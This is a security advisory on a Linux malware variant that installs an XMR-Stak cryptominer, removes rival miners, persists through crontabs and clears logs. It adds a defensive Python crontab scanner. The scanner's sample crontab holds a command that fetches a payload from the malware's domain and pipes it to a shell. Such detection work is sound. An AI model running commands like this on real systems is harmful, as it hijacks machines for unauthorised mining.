The Linux platform is being targeted by a new malware strain that installs the XMR-Stak Cryptonight cryptocurrency miner. It also searches for other Linux malware and coin miners already present on the compromised machine and kills them to maximize its own cryptocurrency mining.
This KORKERDS variant downloads the universal Stratum XMR-Stak pool miner, which uses the system's CPU or GPU to mine Cryptonight currencies. The following activities have also been observed:
Function B kills previously installed malware, coin miners, and all related services referenced by an accompanying malware. It also creates new directories and files, and stops processes with connections to identified IP addresses. Function D downloads the coin miner binary from hxxp://yxarsh[.]shop/64 and runs it. Function C downloads a script from hxxp://yxarsh[.]shop/0, saves it to the file /usr/local/bin/dns, and creates a new crontab that calls this script at 1 a.m. It also downloads hxxp://yxarsh[.]shop/1.jpg and places it in different crontabs.
The malware also clears system logs to erase its traces, and achieves persistence with the help of the implanted crontab files, so that it survives reboots and deletion of the binary. The second stage of the infection originates from multiple IP cameras and web services via TCP port 8161, from domains where the attackers have stored the crontab file that launches the main stage of the attack.
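The crontab-based persistence described above is something a defender can check for directly. The following scanner is an added example written for this advisory, not a tool from the original analysis: it walks crontab text and flags entries that reference the advisory's domain, the dropped script path /usr/local/bin/dns, a download of 1.jpg piped into a shell, or the 1 a.m. schedule when paired with one of those indicators. The sample crontab lines are constructed, the crontab file locations are assumed to be a standard Linux layout, and the domain is matched in both its live and defanged spelling.

```python
"""Scan crontab text for the persistence indicators named in the advisory.

Added example; indicators are taken from the advisory, the sample crontab is
constructed, and the cron file locations assume a standard Linux layout.
"""
import glob
import os
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicators from the advisory. The domain is written in its live form; the
# scanner also matches the defanged hxxp://...[.]... spelling used in reports.
IOC_DOMAIN = "yxarsh.shop"
IOC_SCRIPT_PATH = "/usr/local/bin/dns"
IOC_PAYLOAD_NAME = "1.jpg"
IOC_HOUR = "1"  # the dropped script is scheduled for 1 a.m.

# Assumed locations of system and per-user crontabs on a typical Linux host
CRON_LOCATIONS = ["/etc/crontab", "/etc/cron.d/*",
                  "/var/spool/cron/crontabs/*", "/var/spool/cron/*"]

PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba)?sh\b")


@dataclass
class Finding:
    source: str
    line_no: int
    reason: str
    line: str


def schedule_fields(line: str) -> Optional[Tuple[str, str]]:
    """Return the (minute, hour) fields of a crontab entry, or None for lines
    that are not entries (for example VAR=value assignments)."""
    fields = line.split()
    if len(fields) < 6 or "=" in fields[0]:
        return None
    return fields[0], fields[1]


def scan_crontab(text: str, source: str = "<text>") -> List[Finding]:
    """Return one Finding per indicator matched on each crontab line."""
    findings: List[Finding] = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Normalise defanged notation so live and defanged forms both match
        norm = line.replace("[.]", ".").replace("hxxp", "http")
        hits = []
        if IOC_DOMAIN in norm:
            hits.append(f"command references {IOC_DOMAIN}")
        if IOC_SCRIPT_PATH in norm:
            hits.append(f"command runs dropped script {IOC_SCRIPT_PATH}")
        if IOC_PAYLOAD_NAME in norm and PIPE_TO_SHELL.search(norm):
            hits.append(f"fetches {IOC_PAYLOAD_NAME} and pipes it to a shell")
        # The 1 a.m. schedule alone is benign; report it only alongside an IOC
        if hits and schedule_fields(line) == ("0", IOC_HOUR):
            hits.append("scheduled at 1 a.m., matching the advisory's crontab")
        findings.extend(Finding(source, no, h, line) for h in hits)
    return findings


def scan_system_crontabs() -> List[Finding]:
    """Scan the live host's crontab files; unreadable files are skipped."""
    findings: List[Finding] = []
    for pattern in CRON_LOCATIONS:
        for path in glob.glob(pattern):
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_crontab(fh.read(), path))
            except OSError:
                continue
    return findings


# Constructed sample: two benign entries, then two that mirror the advisory
SAMPLE_CRONTAB = """\
# constructed sample crontab
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * root /usr/lib/sysstat/sa1 1 1
0 1 * * * /usr/local/bin/dns
*/10 * * * * curl -fsSL hxxp://yxarsh[.]shop/1.jpg | sh
"""

if __name__ == "__main__":
    results = scan_system_crontabs()
    if os.path.exists(IOC_SCRIPT_PATH):
        results.append(Finding(IOC_SCRIPT_PATH, 0, "dropped script exists on disk", ""))
    for f in results:
        print(f"{f.source}:{f.line_no}: {f.reason}\n    {f.line}")
    if not results:
        print("no crontab indicators from the advisory found; sample scan follows")
        for f in scan_crontab(SAMPLE_CRONTAB, "sample"):
            print(f"{f.source}:{f.line_no}: {f.reason}")
```

Run as root so that per-user crontabs under /var/spool/cron are readable; on the constructed sample, the scanner reports the dropped-script entry (with its 1 a.m. schedule) and the entry that fetches 1.jpg from the advisory's domain, while the two benign entries produce nothing.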
Other unspecified impact is also possible.
Indicators of Compromise
Malware Hash (MD5/SHA1/SHA256)
Block the threat indicators at their respective controls.
Keep all Linux systems up to date with the latest security patches, as Linux is being targeted by many threat actors.